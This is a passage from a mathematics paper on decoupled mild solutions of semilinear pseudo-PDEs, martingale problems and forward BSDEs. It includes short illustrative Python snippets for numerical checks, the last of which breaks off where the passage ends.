The framework of this paper is the canonical space
$\Omega = \mathbbm{D}([0,T],E)$ of cadlag functions defined on
the interval $[0,T]$
with values in a Polish space $E$. This space will be equipped
with a family $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times E}$ of probability measures
indexed by an initial time $s\in[0,T]$ and a starting point $x \in E$.
For each $(s,x)\in[0,T]\times E$, $\mathbbm{P}^{s,x}$ corresponds to
the law of an underlying forward Markov process with time index $[0,T]$, taking values in the Polish state space $E$ which is
characterized as the solution of a well-posed martingale problem
related to a certain operator $(\mathcal{D}(a),a)$ and an increasing continuous
function $V:[0,T] \rightarrow {\mathbbm R}$.
In the companion paper
\cite{paper1preprint}
we have introduced a semilinear equation generated by $(\mathcal{D}(a),a)$, called
{\it Pseudo-PDE}, of the type
\begin{equation}\label{PDEIntro}
\left\{
\begin{array}{rccc}
a(u) + f\left(\cdot,\cdot,u,\sqrt{\Gamma(u,u)}\right)&=&0& \text{ on } [0,T]\times E \\
u(T,\cdot)&=&g,&
\end{array}\right.
\end{equation}
where $\Gamma(u,u)=a(u^2)-2ua(u)$ is a potential theory operator called
the {\it carr\'e du champs operator}.
A classical solution of \eqref{PDEIntro} is defined as an element of
$\mathcal{D}(a)$ verifying \eqref{PDEIntro}. In
\cite{paper1preprint}
we have also defined the notion of {\it martingale solution}
of \eqref{PDEIntro}, see Definition \ref{D417}.
A function $u$ is a martingale solution if \eqref{PDEIntro}
holds with the map $a$ (resp. $\Gamma$) replaced by an extended
operator $\mathfrak{a}$ (resp. $\mathfrak{G}$), which is introduced
in Definition \ref{extended} (resp. \ref{extendedgamma}).
The martingale solution extends the (analytical) notion
of classical solution, however it is a probabilistic concept.
The objectives of the present paper are essentially three.
\begin{enumerate}
\item To introduce an alternative (this time analytical) notion of solution,
which we call {\it decoupled mild}
since it makes use of the time-dependent transition kernel
associated with $a$.
This new type of solution will be shown to be essentially equivalent to
the martingale one.
\item To show existence and uniqueness of decoupled mild solutions.
\item To emphasize the link with solutions of forward BSDEs (FBSDEs)
without driving martingale introduced in
\cite{paper1preprint}.
\end{enumerate}
The above-mentioned FBSDEs are of the form
\begin{equation}\label{BSDEIntro}
Y^{s,x}_t = g(X_T) + \int_t^T f\left(r,X_r,Y^{s,x}_r,\sqrt{\frac{d\langle M^{s,x}\rangle}{dV}}(r)\right)dV_r -(M^{s,x}_T - M^{s,x}_t),
\end{equation}
in a stochastic basis $\left(\Omega,\mathcal{F}^{s,x},(\mathcal{F}^{s,x}_t)_{t\in[0,T]},\mathbbm{P}^{s,x}\right)$ which depends on $(s,x)$. Under suitable conditions, the solution of
this FBSDE is a couple $(Y^{s,x},M^{s,x})$
of cadlag stochastic processes, where $M^{s,x}$ is a martingale.
This equation was introduced and studied in \cite{paper1preprint}.
We refer to the introduction and reference list of the previous paper
for an extensive description of contributions to non-Brownian type BSDEs.
\\
\\
The classical forward BSDE, which is driven by a Brownian motion
is of the form
\begin{equation}\label{BrownianBSDE}
\left\{\begin{array}{rcl}
X^{s,x}_t &=& x+ \int_s^t \mu(r,X^{s,x}_r)dr +\int_s^t \sigma(r,X^{s,x}_r)dB_r\\
Y^{s,x}_t &=& g(X^{s,x}_T) + \int_t^T f\left(r,X^{s,x}_r,Y^{s,x}_r,Z^{s,x}_r\right)dr -\int_t^T Z^{s,x}_rdB_r,
\end{array}\right.
\end{equation}
where $B$ is a Brownian motion.
Existence and uniqueness for \eqref{BrownianBSDE}
were first established
mainly under Lipschitz conditions on $f$ with respect to the third
and fourth variable; $\mu$ and $\sigma$ were also assumed to be
Lipschitz (with respect to $x$) and to have linear growth.
Those conditions were subsequently
considerably relaxed, see \cite{PardouxRascanu}
and references therein.
This is a particular case of a more general (non-Markovian) Brownian BSDE
introduced in 1990 by E. Pardoux and
S. Peng in \cite{parpen90}, after an early work
of J.M. Bismut in 1973 in \cite{bismut}.
Equation \eqref{BrownianBSDE} provides a probabilistic representation of
a semilinear partial differential
equation of parabolic type with terminal condition:
\begin{equation}\label{PDEparabolique}
\left\{
\begin{array}{l}
\partial_tu + \frac{1}{2}\underset{i,j\leq d}{\sum} (\sigma\sigma^\intercal)_{i,j}\partial^2_{x_ix_j}u + \underset{i\leq d}{\sum} \mu_i\partial_{x_i}u + f(\cdot,\cdot,u,\sigma\nabla u)=0\quad \text{ on } [0,T[\times\mathbbm{R}^d \\
u(T,\cdot) = g.
\end{array}\right.
\end{equation}
Given, for every $(s,x)$, a solution $(Y^{s,x}, Z^{s,x})$ of the FBSDE \eqref{BrownianBSDE},
under some continuity assumptions on the coefficients, see e.g. \cite{pardoux1992backward}, it was proved that
the function $u(s,x):= Y^{s,x}_s$ is
a viscosity solution of \eqref{PDEparabolique},
see also \cite{peng1991probabilistic,
pardoux1992backward, el1997backward} for related work.
We extend this idea to the general case in which the FBSDE is
\eqref{BSDEIntro} with solution $(Y^{s,x}, M^{s,x})$.
In that case $u(s,x):= Y^{s,x}_s$ will be the decoupled mild solution of
\eqref{PDEIntro}, see Theorem \ref{Representation};
in that general context the notion of decoupled mild solution replaces
the one of viscosity solution, for reasons that we will explain below.
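The representation $u(s,x):=Y^{s,x}_s$ can be illustrated by an elementary numerical sketch. The snippet below (plain Python, not taken from the paper) assumes the simplest sub-case of \eqref{BrownianBSDE}: $\mu=0$, $\sigma=1$, a vanishing driver $f\equiv 0$ and the arbitrary terminal condition $g(y)=y^2$, so that $Y^{s,x}_s=\mathbbm{E}[g(X^{s,x}_T)]$, while the corresponding solution of \eqref{PDEparabolique} is explicitly $u(s,x)=x^2+T-s$.

```python
import math
import random

# Sketch (not from the paper): Brownian case with mu = 0, sigma = 1, driver f = 0,
# and the arbitrary terminal condition g(y) = y^2.
random.seed(0)
T, s, x = 1.0, 0.25, 0.5

def g(y):
    return y * y

# With f = 0 the BSDE yields Y^{s,x}_s = E[g(X^{s,x}_T)], where X^{s,x}_T = x + sqrt(T-s) Z.
n = 200_000
mc = sum(g(x + math.sqrt(T - s) * random.gauss(0.0, 1.0)) for _ in range(n)) / n

# Explicit solution of du/dt + (1/2) d^2u/dx^2 = 0, u(T,.) = g: u(s,x) = x^2 + (T - s).
exact = x * x + (T - s)
```

The Monte Carlo estimate matches the explicit PDE solution up to statistical error, which is precisely the content of the identity $u(s,x)=Y^{s,x}_s$ in this degenerate case.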
One celebrated problem in the case of Brownian FBSDEs is the characterization
of $Z^{s,x}$ through a deterministic function $v$.
This is what we will call the {\it identification problem}.
In general the link between
$v$ and $u$ is not always analytically established, except when $u$
has some suitable differentiability property, see e.g.
\cite{barles1997sde}:
in that case $v$ is closely related to the gradient of $u$.
In our case, the notion of decoupled mild solution allows us to identify $(u,v)$
as the analytical solution of a deterministic problem.
In the literature, the notion of mild
solution of PDEs was used in finite dimension in
\cite{BSDEmildPardouxBally},
where the authors tackled diffusion operators generating symmetric Dirichlet forms and associated Markov processes thanks to the theory of Fukushima Dirichlet forms, see e.g. \cite{fuosta}.
Infinite dimensional setups were considered for example
in \cite{fuhrman_tessitore02} where an infinite
dimensional BSDE could produce the mild solution of a PDE on a
Hilbert space.
Let $B$ be a functional Banach space $(B,\|\cdot\|)$
of real Borel functions defined on $E$
and
$A$ be an unbounded operator on $(B,\|\cdot\|)$.
In the theory of evolution equations one often considers systems of
the type
\begin{equation}\label{linear}
\left\{\begin{array}{rcl}
\partial_tu+Au &=& l \text{ on }[0,T]\times\mathbbm{R}^d\\
u(T,\cdot) &=& g,
\end{array}\right.
\end{equation}
where
$l:[0,T] \times \mathbbm{R}^d \rightarrow {\mathbbm R}$
and $g:\mathbbm{R}^d \rightarrow {\mathbbm R}$ are
such that $l(t,\cdot)$ and $g$ belong to $B$ for every
$t \in [0,T]$.
The idea of mild solutions
consists in considering $A$ (when possible) as the infinitesimal generator
of a semigroup of operators
$(P_t)_{t\geq 0}$ on $(B,\|\cdot\|)$,
in the following sense: there is a dense subset $\mathcal{D}(A) \subset B$
on which
$A f=\underset{t\rightarrow 0^+}{\text{lim }}\frac{1}{t}(P_tf-f)$.
In particular one may think of $(P_t)_{t\geq 0}$ as the heat kernel semigroup and of
$A$ as $\frac{1}{2}\Delta $.
The approach of mild solutions is also very popular in the framework of
stochastic PDEs see e. g.
\cite{daprato_zabczyk14}.
\\
When $A$ is a local operator, one solution (in the sense of distributions, or in the sense of
evaluation against test functions)
of the linear evolution problem with terminal condition
\eqref{linear} is
the so-called {\it mild solution}
\begin{equation}\label{mildlinear}
u(s,\cdot)= P_{T-s}[g] - \int_s^T P_{r-s}[l(r,\cdot)]dr.
\end{equation}
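As a quick sanity check of \eqref{mildlinear}, one can take the simplest conceivable setting: a one-point state space, on which the semigroup reduces to the scalar flow $P_t\varphi = e^{\mu t}\varphi$ with $A\varphi=\mu\varphi$. The sketch below (plain Python; the values of $\mu$, $g$ and the source $l$ are arbitrary) evaluates \eqref{mildlinear} by trapezoidal quadrature and verifies by finite differences that it satisfies \eqref{linear}, i.e. $\partial_s u + Au = l$ with $u(T)=g$.

```python
import math

# Sketch: one-point state space, P_t phi = exp(mu t) phi, A phi = mu phi (mu, g, l arbitrary)
mu, T, g = -0.7, 1.0, 2.0
l = math.cos  # source term l(r)

def P(t, phi):
    return math.exp(mu * t) * phi

def u(s, n=4000):
    # mild formula: u(s) = P_{T-s} g - int_s^T P_{r-s} l(r) dr (trapezoidal quadrature)
    h = (T - s) / n
    vals = [P(i * h, l(s + i * h)) for i in range(n + 1)]
    integral = h * (sum(vals) - 0.5 * (vals[0] + vals[-1]))
    return P(T - s, g) - integral

# finite-difference check that d/ds u(s) + A u(s) = l(s), and that u(T) = g
eps = 1e-4
residuals = [abs((u(s + eps) - u(s - eps)) / (2 * eps) + mu * u(s) - l(s))
             for s in (0.2, 0.5, 0.8)]
terminal_gap = abs(u(T) - g)
```

The residuals vanish up to quadrature and finite-difference error, so \eqref{mildlinear} indeed solves \eqref{linear} in this toy case.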
If $ l$ is explicitly a function of $u$ then
\eqref{mildlinear} becomes itself an equation
and a mild solution would consist in finding a fixed
point of \eqref{mildlinear}.
Let us now suppose the existence of a
map
$S: \mathcal{D}(S) \subset B \rightarrow B$, typically $S$ being the gradient,
when $(P_t)$ is the heat kernel semigroup.
The natural question is what would be a natural replacement for
a {\it mild solution}
for
\begin{equation}\label{linearS}
\left\{\begin{array}{rcl}
\partial_tu+Au &=& f(s,\cdot,u,Su) \text{ on }[0,T]\times\mathbbm{R}^d\\
u(T,\cdot) &=& g.
\end{array}\right.
\end{equation}
If the domain of $S$ is $B$, then it is not
difficult to extend the notion of mild solution to this case.
One novelty of our approach consists in considering
the case of solutions $u:[0,T] \times \mathbbm{R}^d \rightarrow \mathbbm{R}$
for which $Su(t,\cdot)$ is not defined.
\begin{enumerate}
\item Suppose one expects a solution not to be classical,
i.e. such that $u(r,\cdot)$ should
not belong to $\mathcal{D}(A)$ but should be
in the domain of $S$.
In the case when Pseudo-PDEs are usual PDEs,
one may think of possible solutions which are not $C^{1,2}$
but admit a gradient, typically viscosity solutions which are
differentiable in $x$.
In that case the usual idea of
mild solutions theory applies to equations of type
\eqref{linearS}.
In this setup, inspired by \eqref{mildlinear} a mild solution of the equation is naturally
defined as a solution of the integral equation
\begin{equation}\label{E39}
u(s,\cdot)= P_{T-s}[g] + \int_s^T P_{r-s}[f(r,\cdot,u(r,\cdot),Su(r,\cdot))]dr.
\end{equation}
\item However, there may be reasons for which
the candidate solution $u$ is such that
$u(t,\cdot)$ does not even belong to $\mathcal{D}(S)$.
For PDEs, this is often the case for viscosity solutions which do not admit a gradient.
In that case the idea is to replace \eqref{E39}
with
\begin{equation}
u(s,\cdot)= P_{T-s}[g] + \int_s^T P_{r-s}[f(r,\cdot,u(r,\cdot),v(r,\cdot))]dr,
\end{equation}
and to add a second equality which expresses in a {\it mild} form
the equality $v(r,\cdot) = Su(r,\cdot)$.
\end{enumerate}
We will work out the previous methodology for
the $Pseudo-PDE(f,g)$. In that case
$S$ will be given by the mapping
$u\longmapsto \sqrt{\Gamma(u,u)}$.
If $A$ is for instance the Laplacian $\frac{1}{2}\Delta$, one would have $\Gamma(u,u)=\|\nabla u\|^2$.
For pedagogical purposes, one can first consider an operator $a$ of
type $\partial_t+A$, where $A$ is the generator
of a Markovian (time-homogeneous) semigroup.
In this case,
\begin{eqnarray*}
\Gamma(u,u) &=& \partial_t(u^2)+A(u^2)-2u\partial_tu-2uAu \\
&=& A(u^2) - 2uAu.
\end{eqnarray*}
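The cancellation of the time derivatives above can be checked on a toy example. The sketch below (plain Python; the choices $A=\partial^2_{xx}$ and the test function $u(t,x)=tx^2$ are arbitrary, with all partial derivatives hand-coded) compares $a(u^2)-2u\,a(u)$, computed with $a=\partial_t+A$, against $A(u^2)-2uAu$ on a grid of points.

```python
# Sketch: a = d/dt + A with A = d^2/dx^2, test function u(t,x) = t x^2 (derivatives hand-coded)
def u(t, x):      return t * x ** 2
def du_dt(t, x):  return x ** 2                # d/dt u
def Au(t, x):     return 2 * t                 # d^2/dx^2 u
def du2_dt(t, x): return 2 * t * x ** 4        # d/dt (u^2), with u^2 = t^2 x^4
def Au2(t, x):    return 12 * t ** 2 * x ** 2  # d^2/dx^2 (u^2)

def gamma_via_a(t, x):
    # a(u^2) - 2 u a(u): time derivatives still present
    return (du2_dt(t, x) + Au2(t, x)) - 2 * u(t, x) * (du_dt(t, x) + Au(t, x))

def gamma_via_A(t, x):
    # A(u^2) - 2 u A u: no time derivatives left
    return Au2(t, x) - 2 * u(t, x) * Au(t, x)

grid = [(t / 4, x / 4) for t in range(1, 5) for x in range(-4, 5)]
max_gap = max(abs(gamma_via_a(t, x) - gamma_via_A(t, x)) for t, x in grid)
```

Both expressions agree exactly on the grid, confirming that $\Gamma(u,u)$ involves no time derivatives when $a=\partial_t+A$.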
Equation
\begin{equation}\label{Emilddiffusion}
\partial_tu+Au + f\left(\cdot,\cdot,u,\sqrt{\Gamma(u,u)}\right)=0,
\end{equation}
could therefore be decoupled into the system
\begin{equation}
\left\{
\begin{array}{l}
\partial_tu+Au + f(\cdot,\cdot,u,v)= 0 \\
v^2=\partial_t(u^2)+A(u^2)-2u(\partial_tu+Au),
\end{array}\right.
\end{equation}
which furthermore can be expressed as
\begin{equation}
\left\{
\begin{array}{rcl}
\partial_tu+Au &=& - f(\cdot,\cdot,u,v)\\
\partial_t(u^2)+A(u^2)&=&v^2-2uf(\cdot,\cdot,u,v)
\end{array}\right.
\end{equation}
Taking into account the existing notions of mild solution \eqref{mildlinear} (resp. \eqref{E39}) for the corresponding equation \eqref{linear} (resp. \eqref{linearS}), one is naturally tempted to define a decoupled mild solution of \eqref{PDEIntro} as a function $u$ for which there exists $v\geq 0$ such that
\begin{equation}
\left\{
\begin{array}{rcl}
u(s,\cdot)&=& P_{T-s}[g] + \int_s^T P_{r-s}[f(r,\cdot,u(r,\cdot),v(r,\cdot))]dr\\
u^2(s,\cdot)&=& P_{T-s}[g^2] - \int_s^T P_{r-s}[v^2(r,\cdot)-2u(r,\cdot)f(r,\cdot,u(r,\cdot),v(r,\cdot))]dr.
\end{array}\right.
\end{equation}
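A completely elementary instance in which this system can be checked numerically (a sketch, not taken from the paper) is a continuous-time two-state Markov chain with generator matrix $Q$: there $P_t=e^{tQ}$ is explicit and $\Gamma(\varphi,\varphi)(x)=Q(\varphi^2)(x)-2\varphi(x)Q\varphi(x)=\sum_y Q(x,y)(\varphi(y)-\varphi(x))^2$. Taking $f\equiv 0$ (so that the first equation simply gives $u(s,\cdot)=P_{T-s}[g]$; the rates and terminal condition below are arbitrary), the snippet verifies that the second equation then holds with $v^2=\Gamma(u,u)$.

```python
import math

# Sketch: two-state chain with generator Q = [[-q01, q01], [q10, -q10]] (rates arbitrary)
q01, q10 = 1.3, 0.6
lam = q01 + q10
T = 1.0
g = [2.0, -1.0]  # terminal condition on the two-point state space (arbitrary)

def P(t, phi):
    # closed form e^{tQ} phi = Pi phi + e^{-lam t}(phi - Pi phi), Pi the stationary projector
    pi = (q10 / lam, q01 / lam)
    mean = pi[0] * phi[0] + pi[1] * phi[1]
    return [mean + math.exp(-lam * t) * (phi[x] - mean) for x in (0, 1)]

def u(s):
    return P(T - s, g)  # first equation with f = 0

def gamma(phi):
    # carre du champs: Q(phi^2)(x) - 2 phi(x) Q phi(x) = sum_y Q(x,y)(phi(y)-phi(x))^2
    return [q01 * (phi[1] - phi[0]) ** 2, q10 * (phi[0] - phi[1]) ** 2]

def rhs(s, n=3000):
    # second equation: P_{T-s}[g^2] - int_s^T P_{r-s}[v^2(r,.)] dr with v^2 = Gamma(u,u)
    h = (T - s) / n
    acc = [0.0, 0.0]
    for i in range(n + 1):
        w = 0.5 * h if i in (0, n) else h  # trapezoidal weights
        term = P(i * h, gamma(u(s + i * h)))
        acc = [acc[x] + w * term[x] for x in (0, 1)]
    head = P(T - s, [g[0] ** 2, g[1] ** 2])
    return [head[x] - acc[x] for x in (0, 1)]

s0 = 0.3
gap = max(abs(u(s0)[x] ** 2 - rhs(s0)[x]) for x in (0, 1))
```

The gap is of the order of the quadrature error only, illustrating how the second equation encodes $v^2=\Gamma(u,u)$ in mild form.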
As we mentioned before, our
approach is an alternative to a possible notion of viscosity
solution for the $Pseudo-PDE(f,g)$. That notion will be the object of
a subsequent paper, at least in the case when the driver does not depend
on the last variable. In the general case the notion of viscosity solution
does not fit well, because of the lack of suitable comparison theorems.
On the other hand, even in the recent literature (see \cite{barles1997backward}), specific conditions on the driver are required in order to show the existence of viscosity solutions.
In our opinion, our approach of decoupled mild solutions for $Pseudo-PDE(f,g)$
constitutes an interesting novelty even in the case of
semilinear parabolic PDEs.
The main contributions of the paper are essentially the following.
In Section \ref{mild}, Definition \ref{mildsoluv} introduces our notion of decoupled mild solution of \eqref{PDEIntro} in the general setup. In Section \ref{mart-mild}, Proposition \ref{MartingaleImpliesMild} states that under a square integrability type condition, every martingale solution is a decoupled mild solution of \eqref{PDEIntro}. Conversely, Proposition \ref{MildImpliesMartingale} shows that every decoupled mild solution is a martingale solution. In Theorem \ref{MainTheorem} we prove existence and uniqueness of a decoupled mild solution for \eqref{PDEIntro}. In Section \ref{FBSDEs}, we show how the unique decoupled mild solution of \eqref{PDEIntro} can be represented via the FBSDEs \eqref{BSDEIntro}.
In Section \ref{exemples} we develop examples of Markov processes and corresponding operators $a$ falling into our abstract setup. In Section \ref{S4a}, we work in the setup of \cite{stroock}: the Markov process is a diffusion with jumps and the corresponding operator is of diffusion type with an additional non-local term. In Section \ref{S4b} we consider Markov processes associated to pseudo-differential operators (typically the fractional Laplacian) as in \cite{jacob2005pseudo}. In Section \ref{S4c} we study a semilinear parabolic PDE with distributional drift, the corresponding process being the solution of an SDE with distributional drift as defined in \cite{frw1}. Finally, in Section \ref{S4d}, we are interested in diffusions on differentiable manifolds and associated diffusion operators, an example being Brownian motion on a Riemannian manifold associated with the Laplace-Beltrami operator.
\section{Preliminaries}\label{S1}
In this section we will recall the notations, notions and results of the companion paper
\cite{paper1preprint},
which will be used here.
\begin{notation}
In the whole paper, concerning functional spaces we will use the following notations.
\\
A topological space $E$ will always be considered as a measurable space with its Borel $\sigma$-field which shall be denoted $\mathcal{B}(E)$. Given two topological spaces $E,F$, $\mathcal{C}(E,F)$ (respectively $\mathcal{B}(E,F)$) will denote the set of functions from $E$ to $F$ which are continuous (respectively Borel) and, if $F$ is a metric space, $\mathcal{C}_b(E,F)$ (respectively $\mathcal{B}_b(E,F)$) will denote the set of functions from $E$ to $F$ which are bounded and continuous (respectively bounded and Borel). For any $p\in[1,\infty]$ and $d\in\mathbbm{N}^*$, $(L^p(\mathbbm{R}^d),\|\cdot\|_p)$ will denote the usual Lebesgue space equipped with its usual norm.
\\
\\
On a fixed probability space $\left(\Omega,\mathcal{F},\mathbbm{P}\right)$, for any $p\in\mathbbm{N}^*$, $L^p$ will denote the set of random variables with finite $p$-th moment.
\\
\\
A probability space equipped with a right-continuous filtration $\left(\Omega,\mathcal{F},(\mathcal{F}_t)_{t\in\mathbbm{T}},\mathbbm{P}\right)$ (where $\mathbbm{T}$ is equal to $\mathbbm{R}_+$ or to $[0,T]$ for some $T\in\mathbbm{R}_+^*$) will be called a \textbf{stochastic basis} and will be said to \textbf{fulfill the usual conditions} if the probability space is complete and if $\mathcal{F}_0$ contains all the $\mathbbm{P}$-negligible sets. When a stochastic basis is fixed, $\mathcal{P}ro$ denotes the \textbf{progressive $\sigma$-field} on $\mathbbm{T}\times\Omega$.
\\
\\
On a fixed stochastic basis $\left(\Omega,\mathcal{F},(\mathcal{F}_t)_{t\in\mathbbm{T}},\mathbbm{P}\right)$, we will use the following notations and vocabulary,
concerning spaces of stochastic processes,
most of them being taken or adapted from \cite{jacod79} or \cite{jacod}.
$\mathcal{V}$ (resp $\mathcal{V}^+$) will denote the set of adapted, bounded variation (resp non-decreasing) processes starting at 0; $\mathcal{V}^p$ (resp $\mathcal{V}^{p,+}$) the elements of $\mathcal{V}$ (resp $\mathcal{V}^+$) which are predictable, and $\mathcal{V}^c$ (resp $\mathcal{V}^{c,+}$) the elements of $\mathcal{V}$ (resp $\mathcal{V}^+$) which are continuous.
\\
$\mathcal{M}$ will be the space of cadlag martingales.
For any $p\in[1,\infty]$, $\mathcal{H}^p$ will denote
the subset of $\mathcal{M}$ of elements $M$ such that $\underset{t\in \mathbbm{T}}{\text{sup }}|M_t|\in L^p$, and in this set we identify indistinguishable elements. It is a Banach space for the norm
$\| M\|_{\mathcal{H}^p}=\mathbbm{E}\left[\left(\underset{t\in \mathbbm{T}}{\text{sup }}|M_t|\right)^p\right]^{\frac{1}{p}}$, and
$\mathcal{H}^p_0$ will denote the Banach subspace of $\mathcal{H}^p$
containing the elements starting at zero.
\\
If $\mathbbm{T}=[0,T]$ for some $T\in\mathbbm{R}_+^*$, a stopping time will be considered as a random variable with values in
$[0,T]\cup\{+\infty\}$.
We define a \textbf{localizing sequence of stopping times} as an increasing sequence of stopping times $(\tau_n)_{n\geq 0}$ such that there exists $N\in\mathbbm{N}$ for which $\tau_N=+\infty$. Let $Y$ be a process and $\tau$ a stopping time; we denote by $Y^{\tau}$ the process $t\mapsto Y_{t\wedge\tau}$, which we call the \textbf{stopped process}. If $\mathcal{C}$ is a set of processes, we define its \textbf{localized class} $\mathcal{C}_{loc}$ as the set of processes $Y$ for which there exists a localizing sequence $(\tau_n)_{n\geq 0}$ such that for every $n$, the stopped process $Y^{\tau_n}$ belongs to $\mathcal{C}$.
\\
For any $M\in \mathcal{M}_{loc}$, we denote $[M]$ its \textbf{quadratic variation} and if moreover $M\in\mathcal{H}^2_{loc}$, $\langle M\rangle$ will denote its (predictable) \textbf{angular bracket}.
$\mathcal{H}_0^2$ will be equipped with the scalar product defined by $(M,N)_{\mathcal{H}^2}=\mathbbm{E}[M_TN_T]
=\mathbbm{E}[\langle M, N\rangle_T]$, which makes it a Hilbert space.
Two local martingales $M,N$ will be said to be \textbf{strongly orthogonal} if $MN$ is a local martingale starting in 0 at time 0. In $\mathcal{H}^2_{0,loc}$ this notion is equivalent to $\langle M,N\rangle=0$.
\end{notation}
Concerning the following definitions and results, we are given some $T\in\mathbbm{R}_+^*$, and a stochastic basis $\left(\Omega,\mathcal{F},(\mathcal{F}_t)_{t\in[0,T]},\mathbbm{P}\right)$ fulfilling the usual conditions.
\begin{definition} \label{StochMeasures}
Let $A$ and $B$ be in $\mathcal{V}^+$. We will say that $dB$ dominates $dA$
{\bf in the sense of stochastic measures} (written $dA\ll dB$) if for almost all $\omega$, $dA(\omega)\ll dB(\omega)$ as Borel measures on $[0,T]$.
\\
\\
Let $B\in \mathcal{V}^+$. $dB\otimes d\mathbbm{P}$ will denote the positive measure on
$(\Omega\times [0,T],\mathcal{F}\otimes\mathcal{B}([0,T]))$ defined for any $F\in\mathcal{F}\otimes\mathcal{B}([0,T])$ by
$dB\otimes d\mathbbm{P}( F) = \mathbbm{E}\left[\int_0^{T}\mathds{1}_F(t,\omega)dB_t(\omega)\right]$.
A property which holds true everywhere except on a null set for
this measure will be said to be true $dB\otimes d\mathbbm{P}$ almost
everywhere (a.e.).
\end{definition}
We recall that given two processes $A,B$ in $\mathcal{V}^{p,+}$, if $dA\ll dB$, there exists a predictable process which we will denote $\frac{dA}{dB}$ and call \textbf{Radon-Nikodym derivative} of $A$ by $B$, verifying $A=\int_0^{\cdot}\frac{dA}{dB}(r)dB_r$, see Proposition I.3.13 in \cite{jacod}.
\\
As in the previous paper
\cite{paper1preprint},
we will be interested in
a Markov process which is
the solution of a martingale problem, which we now recall below.
For definitions and results concerning Markov processes, the reader may refer to Appendix \ref{A2}. In particular, let $E$ be a Polish space and $T\in\mathbbm{R}_+$ a finite horizon. We now consider $\left(\Omega,\mathcal{F},(X_t)_{t\in[0,T]},(\mathcal{F}_t)_{t\in[0,T]}\right)$, the canonical space which was introduced in Notation \ref{canonicalspace}, and a canonical Markov class measurable in time $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times E}$, see Definitions \ref{defMarkov} and \ref{DefFoncTrans}. We will also consider the completed stochastic basis $\left(\Omega,\mathcal{F}^{s,x},(\mathcal{F}^{s,x}_t)_{t\in[0,T]},\mathbbm{P}^{s,x}\right)$,
see Definition \ref{CompletedBasis}.
\\
\\
We now recall the notion of martingale problem associated to
an operator, as introduced in Section 4 of \cite{paper1preprint}.
\begin{definition}\label{MartingaleProblem}
Given a linear algebra $\mathcal{D}(a)\subset \mathcal{B}([0,T]\times E,\mathbbm{R})$, a linear operator $a$ mapping $\mathcal{D}(a)$ into $\mathcal{B}([0,T]\times E,\mathbbm{R})$ and a non-decreasing continuous function $V:[0,T]\rightarrow\mathbbm{R}_+$ starting at $0$, we say that a set of probability measures $(\mathbbm{P}^{s,x})_{(s,x)\in [0,T]\times E}$ defined on $(\Omega,\mathcal{F})$ solves the {\bf Martingale Problem associated to} $(\mathcal{D}(a),a,V)$ if, for any
$(s,x)\in[0,T]\times E$, $\mathbbm{P}^{s,x}$ verifies
\begin{description}
\item{(a)} $\mathbbm{P}^{s,x}(\forall t\in[0,s], X_t=x)=1$;
\item{(b)} for every $\phi\in\mathcal{D}(a)$, the process $\phi(\cdot,X_{\cdot})-\int_s^{\cdot}a(\phi)(r,X_r)dV_r$, $t \in [s,T]$
is a cadlag $(\mathbbm{P}^{s,x},(\mathcal{F}_t)_{t\in[s,T]})$-local martingale.
\end{description}
We say that the {\bf Martingale Problem is well-posed} if for any $(s,x)\in[0,T]\times E$, $\mathbbm{P}^{s,x}$ is the only probability measure
satisfying the properties (a) and (b).
\end{definition}
As for \cite{paper1preprint},
in the sequel of the paper we will assume the following.
\begin{hypothesis}\label{MPwellposed}
The Markov class $(\mathbbm{P}^{s,x})_{(s,x)\in [0,T]\times E}$ solves a well-posed Martingale Problem
associated to a triplet $(\mathcal{D}(a),a,V)$ in the sense
of Definition \ref{MartingaleProblem}.
\end{hypothesis}
\begin{notation}\label{Mphi}
For every $(s,x)\in[0,T]\times E$ and $\phi\in\mathcal{D}(a)$, the process
\\
$t\mapsto\mathds{1}_{[s,T]}(t)\left(\phi(t,X_{t})-\phi(s,x)-\int_s^{t}a(\phi)(r,X_r)dV_r\right)$ will be denoted $M[\phi]^{s,x}$.
\end{notation}
$M[\phi]^{s,x}$ is a cadlag $(\mathbbm{P}^{s,x},(\mathcal{F}_t)_{t\in[0,T]})$-local martingale equal to $0$ on $[0,s]$, and by Proposition \ref{ConditionalExp}, it is also a $(\mathbbm{P}^{s,x},(\mathcal{F}^{s,x}_t)_{t\in[0,T]})$-local martingale.
\\
\\
The bilinear operator below was introduced (in the case of time-homogeneous operators) by J.P. Roth in potential analysis (see Chapter III in \cite{roth}),
and popularized by P.A. Meyer and others in the study of homogeneous Markov processes
(see for example Expos\'e II: L'op\'erateur carr\'e du champs in \cite{sem10} or 13.46 in \cite{jacod79}).
\begin{definition}\label{SFO}
We introduce the bilinear operator
\begin{equation}
\Gamma : \begin{array}{r c l}
\mathcal{D}(a) \times \mathcal{D}(a) & \rightarrow & \mathcal{B}([0,T]\times E) \\
(\phi, \psi) & \mapsto & a(\phi\psi) - \phi a(\psi) - \psi a(\phi).
\end{array}
\end{equation}
The operator $\Gamma$ is
called the \textbf{carr\'e du champs operator}.
\end{definition}
The angular brackets of the martingales introduced in Notation \ref{Mphi}
are expressed via the operator $\Gamma$. Proposition 4.8 of
\cite{paper1preprint}
states the following.
\begin{proposition}\label{bracketindomain}
For any $\phi\in \mathcal{D}(a)$ and $(s,x)\in[0,T]\times E$, $M[\phi]^{s,x}$ is in $\mathcal{H}^2_{0,loc}$.
Moreover, for any $(\phi, \psi)\in \mathcal{D}(a) \times \mathcal{D}(a)$ and $(s,x)\in[0,T]\times E$ we have in $(\Omega,\mathcal{F}^{s,x},(\mathcal{F}^{s,x}_t)_{t\in[0,T]},\mathbbm{P}^{s,x})$ and on the interval $[s,T]$
\begin{equation}
\langle M[\phi]^{s,x} , M[\psi]^{s,x} \rangle = \int_s^{\cdot} \Gamma(\phi,\psi)(r,X_r)dV_r.
\end{equation}
\end{proposition}
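This identity can be illustrated numerically outside the abstract setting (a sketch under the assumption that $X$ is a standard one-dimensional Brownian motion, $V_t=t$ and $a=\partial_t+\frac{1}{2}\Delta$, so that $\Gamma(\phi,\phi)=(\phi')^2$ for time-independent $\phi$). For $\phi(x)=x^2$ one has $M[\phi]_t=X_t^2-t$, and the proposition predicts $\mathbbm{E}[(M[\phi]_1)^2]=\mathbbm{E}\left[\int_0^1 (2X_r)^2dr\right]=2$. The snippet below compares Monte Carlo estimates of both sides.

```python
import math
import random

# Sketch: X standard Brownian motion, V_t = t, a = d/dt + (1/2) Laplacian, phi(x) = x^2,
# so that M[phi]_t = X_t^2 - t and Gamma(phi,phi)(x) = (2x)^2.
random.seed(1)
n_paths, n_steps, T = 40_000, 50, 1.0
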